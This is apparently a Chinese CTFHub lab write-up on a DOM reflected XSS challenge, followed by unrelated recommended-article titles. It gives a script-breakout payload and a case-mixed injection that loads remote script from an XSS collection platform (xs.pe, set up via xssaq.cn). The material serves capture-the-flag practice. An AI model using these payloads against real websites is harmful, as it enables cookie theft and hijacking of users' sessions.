根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式
然后去网页测试一下alert(1)反射
';</script><script>alert(1)</script>
看到 确实存在 去xssaq.cn
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
CTFHub技能树web——XSS——DOM反射
A 八方2024-08-06 21:41
相关推荐
2301_796512523 分钟前
【精通篇】打造React Native鸿蒙跨平台开发高级复合组件库开发系列:Lazyload 懒加载(懒加载的图片)敲敲了个代码9 分钟前
从N倍人力到1次修改:Vite Plugin Modular 如何拯救多产品前端维护困境Yff_world16 分钟前
网络安全与 Web 基础笔记Sapphire~17 分钟前
Vue3-19 hooks 前端数据和方法的封装浩宇软件开发25 分钟前
基于OpenHarmony鸿蒙开发医院预约挂号系统(前端后端分离)嘿是我呀33 分钟前
【用npm安装node时报错“npm 无法加载文件”】干前端34 分钟前
Vue3 组件库工程化实战:BEM 命名规范与 useNamespace 深度解析弓弧名家_玄真君35 分钟前
在ubuntu中安装redisRFCEO37 分钟前
学习前端编程:DOM 树、CSSOM 树、渲染树详解笨蛋不要掉眼泪39 分钟前
Redis主从复制:原理、配置与实战演示